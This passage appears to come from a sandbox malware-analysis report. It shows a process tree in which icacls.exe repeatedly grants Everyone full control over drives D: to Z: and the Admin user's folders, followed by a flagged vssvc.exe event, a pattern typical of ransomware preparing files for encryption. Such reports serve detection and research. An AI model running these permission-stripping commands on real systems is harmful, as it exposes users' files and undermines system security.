C:\Windows\SYSTEM32\icacls.exe"icacls.exe" D:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" E:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3988
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" F:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3936
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" G:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:280
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" H:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3820
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" I:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3852
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" J:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3760
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" K:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:420
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" L:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:476
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" M:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3064
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" N:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4116
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" O:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4160
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" P:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4204
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" Q:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4252
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" R:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4296
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" S:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4340
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" T:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4384
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" U:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4428
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" V:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4472
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" W:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4516
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" X:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4560
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" Y:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4604
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" Z:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4648
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4692
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4780
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4856
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4920
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:3984